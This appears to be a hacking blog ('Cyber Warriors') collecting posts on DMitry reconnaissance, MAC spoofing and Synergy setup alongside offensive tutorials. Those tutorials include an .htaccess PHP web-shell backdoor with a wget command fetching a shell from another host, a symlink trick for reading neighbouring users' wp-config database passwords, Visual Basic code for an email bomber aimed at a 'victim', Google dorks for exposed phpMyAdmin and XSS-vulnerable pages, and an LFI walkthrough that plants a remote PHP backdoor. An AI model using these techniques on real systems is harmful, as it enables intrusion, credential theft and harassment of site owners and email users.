| Cyber Warriors

Dmitry Deepmagic Information Gathering Tool in kali linux

DMitry

(Deepmagic Information Gathering Tool) is a Linux Command Line Application coded in C language.

DMitry has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and more.

The information are gathered with following methods:

* Perform an Internet Number whois lookup.

* Retrieve possible uptime data, system and server data.

* Perform a SubDomain search on a target host.

* Perform an E-Mail address search on a target host.

* Perform a TCP Portscan on the host target.

* A Modular program allowing user specified modules

open dmitry in Kali Linux

Application ==> Kali Linux ==> Information gathering ==> Live Host Identification ==> dmitry

Syntax:

dmitry -(Switches) (victim)

Example:

dmitry -p 192.168.1.5

-o

This command is used to save output specify with a given name our output the default is host.txt you could name it anything you want.

Syntax: dmitry –s domain –o filename

Ex:dmitry –s google.com –o filename

-i

Thiscommand is used to perform a whois lookup of the IP address of a host, this tells us that if we only no the name that dmitry will find the IP for us.

Syntax: dmitry –i IP address

Ex: dmitry –i 192.168.71.128

-w

This command is used to perform a whois lookup on the domain name of a host.

Syntax: dmitry –w domain

Ex: dmitry –w google.com

-n

This command is used to give us Netcraft.com information on a host.

Syntax: dmitry –n domain

Ex: dmitry –n facebook.com

-s

This command is used to performs a search for possible subdomains.

Syntax: dmitry –s domain

Ex: dmitry –s yahoo.com

-e

This command is used to perform a search for possible email addresses.

Syntax: dmitry –e domain

Ex: dmitry –e yahoo.com

-P

This command is used to perform a TCP port scan on a host.

Syntax: dmitry –p IP address

Ex: dmitry –p 192.1681.10

-f

This command is used to perform a TCP port scan on a host showing output reporting filtered ports (useful if there is a firewall in place). For running successfully this command -p must be set.

Syntax: dmitry –pf domain

Ex: dmitry –pf google.com

Alert: Tor Browser app in the Apple Store is fake, spreading Malwares and Spywares! Do not download!

Tor Browser app in the Apple app store is fake and have been found spreading adware and spywares.

According to the official website of Tor Browser, the Browser app available in Apple store on iTunes is fake and has nothing to do with the official version. The developers of Tor said that:

Tor Browser in the Apple App Store is fake. It’s full of adware and spyware. Two users have called to complain. We should have it removed.

The company has been complaining to Apple Inc. for over two months. However, Apple didn’t removed the app until now.

This is a firefox addon which keylogs every thing. Logs can Be retrieved By pressing “alt + x” . A very simple and effective addon.

We Creating Backdoor in .htaccess(Hypertext access)

1: Go public_html in shell and need to edit the .htaccess.

PHP Codes
-------------------------------------------------------
<?php
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess

# <?php passthru($_GET['cmd']); ?>
-------------------------------------------------------
And need to type CMD Commands like this

yoursite.com/.htaccess?cmd=

For Shell Upolad

yoursite.com/.htaccess?cmd=wget -O xyz.php http://yourothersitewithshell/yourshell.txt

Now you can access your shell..

Today i am going to show you how to change mac address in backtrack..

What Is Mac Address ?

A media access control address (MAC address) is a unique identifier assigned to network interfaces for communications on the physical network segment. MAC addresses are used as a network address for most IEEE 802 network technologies, including Ethernet. Logically, MAC addresses are used in themedia access control protocol sublayer of the OSI reference model.

Well changing mac address in Backtrack is pretty easy...

1: Open Console than type ifconfig eth0 down
2: Now type , macchanger -r eth0
3: ifconfig eth0 up

1.1: Command - it will disable eth0
2.1: Command - it will generate random Mac Address
3.1: Command - it will enable the eth0 Grin

Change Mac Address To Whatever You Want-

Change Mac Address Of your Choice-
Open Terminal and type -
4: ifconfig eth0 down
5:type in terminal macchanger --mac your MAc address with : : : example 11:22:33:44:55 eth0
machchanger --mac 11:22:33:44:55 eth0
6: ifconfig eth0 up

I have a secret to increase your internet connectivity response time, or at least lower the delay.This works with games, however I can still notice a significant change of browsing experience

1: Open CMD you can do this by pressing (windows) key + R and type cmd in the text box. Type ipconfig in cmd.
2: Open Regedit by pressing (windows) key + R and type regedit in the text box.
3. Locate to Regedit Directory:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces

4: In cmd, after typing ipconfig you will get this that is where you will find your ip address.

5: In Regedit, you need to find the interface with that (your) IP address.

6: In that directory (you can also do this to all interfaces you will see) you will add a new DWORD (32-bit) Value in Decimal and name it (CASE SENSITIVE) TcpAckFrequency and assign value 1 by double clicking it. Add another value and name it TCPNoDelay and assign value 1. All of them are case sensitive.

After that, you need to reboot for sure.

Best E-Books on Hacking- FREE

I am sharing here some of the best E-Books on different topics like hacking, virus and malware, cryptography, forensics, cyber security etc,These E-Books are available on internet for free. But I thought I would put them together here. I am sharing them here for ABSOLUTELY FREE, just download them

what is symlink

Symlink is basically a linux function that allow you to make shortcut (reference) to another file or directory. In linux servers (shared hostings) there are many users in site and they divide hosting space in different

parts. okay if you see with hackers eye.. how will they use it for evil purpose ??

well when a hacker hacks into a website and shell it and get full access to that particular website and its user

he can only make change in specific disc space that is granted to that particular user. He have no access to other user's space

but he can use this function to read sensitive files i.e database configuration files.

example : me and You have websites on a same server you have installed a wordpress cms on your website

we are on same server but We can Try Symlinking your wordpress config file and

can get details of your database user,password and can login in mysql server easily.

suppose your website directory is

/home/target/public_html/

and mine is

/home/Cyber-Warriors/public_html/

and wordpress has default config file here ===> /public_html/wp-config.php

and it includes your database information

okay now but question is how I gonna Get your database information in that file when I just cant access your disc space?

we can try symlink so what can i do is

execute this command:

ln -s /home/target/public_html

(but execute this command in some new folder because we also gonna write some htaccess configuration code that will allow us to read all files in .txt format)

now we will see another folder created in same directory where we executed code but still we cant access it

we need to add a configuration files that will tell the server how to open this:

------------------------------------------------------

Options all

DirectoryIndex Sux.html

AddType textplain .log

AddType textplain .php

AddType textplain .conf

AddType textplain .sql

AddHandler server-parsed .php

AddHandler txt .html

Require None

Satisfy Any

------------------------------------------------------

what will this code do ? this will treat all .log, php, conf, sql files as plain text .

okay now you can access target user directory by using this

http://yourwebsite/yourfolder/symlinkdir/

you will see all files of your target directory , now just read config file and get database user

and password and login in mysql server

with his account and can add new admin to his website from there

how can you patch this ??

we can change permissions of ln for non root users by issuing command

chmod 760 /bin/ln or we can change php.ini file of main server and disable proc_open and symlink function from there.

How to make an email Bomber

What you will need

1. Microsoft Visual Basic 2010
You Can Download Microsoft Visual Basic 2010 Download!!
So let's Start
1:Open up Visual Basic 2008
2:Create a New Windows Form Application and name it anything you want for example I have named it Cyber-Bomb Then Click OK.
3:Click the window that looks like a new window. Go to the settings on the right scroll down to the bottom until you find
Text. edit this To What you want to appear on the top of your application for Example I Have Called Mine Cyber-Bomb
4:Now it is time for you too design and make the Application. Add 3 Buttons named Start-Stop and Exit You Can Change
The Names By Clicking them and then start typing.
5:Now Add 5 Text-boxes Named
(5.1):Google-mail Username
(5.2):Google-mail password
(5.3):Victims Email
(5.4).Email subject
(5.5).Email message (Make the 5th Text-Box multiline)
6:Now Add One timer.(Do NOT edit anything in this)
7:Add A Label click it and type the Number 0 . ?
8:If you have followed It so far accurately It should look something like this.
9:OK. We have now done the fun bit designing. Now it is time to code it all so it will all work.
10:Double Click The start button and type in
Code:
Timer1start()
11:Double Click The Stop button and type in
Code:
Timer1.stop()
12:Double Click The Exit button and type in
Code:
End
13:Go right to the top of the coding page and above ?Public Class? Type in
Code:
Imports System.Net.Mail
14)If you have followed it correctly so far it should look something like this
15)Now Double click the Timer and type in
Code:
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress(TextBox1.Text)
MyMailMessage.To.Add(TextBox3.Text)
MyMailMessage.Subject = (TextBox4.Text)
MyMailMessage.Body = TextBox5.Text
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox2.Text)
SMTPServer.EnableSsl = True
Label1.Text = Val(Label1.Text + 1)
SMTPServer.Send(MyMailMessage)
16)Now once you have done that.
17)Now Press F5 or click the green Arrow on the top toolbar to Debug and run/test.
18)This only works with googlemail as it uses there SMTP Server. This is nothing special hwo ever it does send mass
emails to the victim and google does banna ccounts that are caught spamming like this so you may be required to make
a fair few accounts.
20)This is very basic as you can see but you can mess around with styles and jazz it up a bit for your liking.

Find Phpmyadmin without login and hack website

Search in google

intitle : phpmyadmin inurl:server_processlist.php

intitle : phpmyadmin inurl:tbl_operations.php

intitle : phpmyadmin inurl:server_collations.php

intitle : phpmyadmin inurl:server_databases.php

intitle : phpmyadmin inurl:server_export.php

intitle : phpmyadmin inurl:server_engines

Share a keyboard and mouse with multiple computers using only software

Hello! Friends NightStalker Here today i show you how to control a multiple pc withe a help of of simple software so if you have more then one so stop jumping from one keyboard and mouse combination to another every time you switch computers. Control multiple computers using just one set – without the need for extra hardware. QuickSynergy for Linux and Mac, working with Synergy for Windows, means there’s no combination of systems that can’t be controlled this quickly and easily. If there’s more than one computer on your desk then you need to check this out.

Multiple monitors are intuitive – you move your mouse from one screen to another and simply continue controlling. But what if your desk has multiple computers on it? Can you move your mouse from one computer to another, then work on that? And what about copy/paste functionality? That, as it turns out, can be just as simple as using multiple monitors – even if you’re using different operating systems.

So let's the fun begin...!!!

1: Go to Synergy's website and click the Download link. Either make a donation or click Continue. Download the correct installer for your operating system. Choose 32-bit if you

aren’t sure which version of Windows you have.

2: Run the file you just downloaded. Agree to the terms and conditions, then click next to install the software. You’ll need to download and install the appropriate version of the Synergy software on each computer you intend to use with your shared mouse and keyboard.

3: Log in to your router via your web browser. Look for a page which lists all the devices connected to the router. Identify your 'Master' computer, and ensure its IP address is set to be static rather than dynamic, with a value such as 192.168.1.10.

4 :Still within the router’s interface, another option will allow you to open ports for certain applications. Synergy uses 24800 by default, so follow your router's manual or online

help to open this port, enabling both TCP and UDP protocols for this port and ensure it is applied to your Master computer (usually you select it from a list or enter its IP address). Save the changes.

5: On the Master computer, launch Synergy, then tick the box labelled Server. Click Configure Server. For each client, drag the monitor icon from the top right into the main

window and arrange monitors in the order in which they’re positioned on your desk. Double click each icon, then give it a unique screen name. Click OK, then click Start.

6: On each client computer, open the Synergy application, and go to the settings and ensure it has the same screen name you chose in the last step. Tick the box next to Client.

Enter your master computer’s IP address. Then click Start. If all is well, it should say ‘connected to server’ and you can move your mouse between your computers and use the

keyboard to type.

Xss Attack tutorial

Introduction

'XSS' also known as 'CSS' (Cross Site Scripting) is a very common vulnerability found in Web Applications, 'XSS' allows the attacker to inject malicious code , the reason of that is the developer trusts user inputs, or mis filtering issues ,then send back user input data to the client browser so the malicious code will execute

Types of XSS

There are Three Types of XSS

• Persistent (Stored) XSS = Attack is stored on the website,s server

• Non Persistent (reflect) XSS = user has to go through a special link to be exposed

• DOM-based XSS = problem exists within the client-side script

Persistent XSS

The persistent XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read. Simply Persistent XSS is occurs when the developer stores the user input data into database server or simply writing it in a file without a proper filtration , then sending them again to the client browser.

for test vulnerability use this script <script>alert("HELL")</script>

If you got This PoPup so your site is Vulnerable

Dorks

!xss inurl:com_feedpostold/feedpost.php?url=

!xss inurl:/products/orkutclone/scrapbook.php?id=
!xss inurl:/products/classified/headersearch.php?sid=
!xss inurl:/poll/default.asp?catid=
!xss inurl:/search_results.php?search=Search&k=
!xss /preaspjobboard//Employee/emp_login.asp?msg1=
!xss pages/match_report.php?mid= pages/match_report.php?mid=
!xss /notice.php?msg= /notice.php?msg=
!xss /gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
!xss /index.php?option=com_easygb&Itemid=
!xss /2wayvideochat/index.php?r=
!xss /view.php?PID= /view.php?PID=
!xss /Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
!xss /showproperty.php?id= /showproperty.php?id=
!xss /vehicle/buy_do_search/?order_direction=
!xss /elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
!xss /winners.php?year=2008&type= /winners.php?year=2008&type=
!xss /schoolmv2/html/studentmain.php?session=
!xss /site_search.php?sfunction= /site_search.php?sfunction=
!xss /search.php?search_keywords= /search.php?search_keywords=
!xss /hexjector.php?site= /hexjector.php?site=
!xss /news.php?id= /news.php?id=
!xss /index.php?view=help&faq=1&ref=
!xss inurl:"contentPage.php?id="
!xss inurl:"displayResource.php?id="
!xss intext:"Website by Mile High Creative"
!xss index.php?option=com_reservations&task=askope&nidser=2&namser= "com_reservations"
!xss /info.asp?page=fullstory&key=1&news_type=news&onvan=
!xss /ser/parohija.php?id= /ser/parohija.php?id=
!xss /strane/pas.php?id= /strane/pas.php?id=
!xss /main.php?sid= /main.php?sid=

Local File inclusion (LFI)

Local File inclusion*Shell upload*| Tutorial

In this article he will demonstrate a local file inclusion vulnerability and he will enhance the attack by uploading a shell on the website.Here are some of the common parameters which are vulnerable to local file inclusion or remote file inclusion attacks.

*index.php?homepage=

*index.php?page=

*index.php?index2=

Requirements:

*A Vulnerable Website

* shell

* User-Agent switcher

* Mozilla Firefox

Requirements:

1) A Vulnerable Website

2) shell

3) User-Agent switcher

4) Mozilla Firefox

The first thing which a hacker will do while finding a LFI vulnerability is to locate the /etc/passwd file. This file indicates that a local file inclusion vulnerability is present in the website. The image below explains the whole story “root” is the username, followed by “x” which happens to be the password, however here it’s shadowed, which means that it’s present is /etc/shadow file. Which is only accessible when you have root privileges.

Next the hacker will check for /proc/self/environ. So change your path to /proc/self/environ/. The /proc/self/environ/ page should look something like this if the file exists, not all sites have it.

Once the local file inclusion vulnerability has been identified , the hacker will try to perform remote code execution and try to some how to further access. This can be done by uploading a PHP backdoor. For that purpose a commonly used tool is User agent switcher.

he hacker edits the useragent and changes code inside to the user agent to the following:

<?php phpinfo();?>

Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

After refreshing the website, He then searches for the keyword "disable_functions" (Ctrl+F Search function)

disable_functions | no value | no value

The above function tells us that website is vulnerable to remote code execution and now we can upload the PHP backdoor. On the finding that the website is vulnerable he then tries to upload the shell by using the following command:

<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

Where the above code uploads a PHP backdoor in a text form and later renames it to .php. Now the shell has been successfully uploaded. Once the PHP backdoor has been uploaded it will look like the following:

For any problem please comment................

Subscribe to: Posts ( Atom )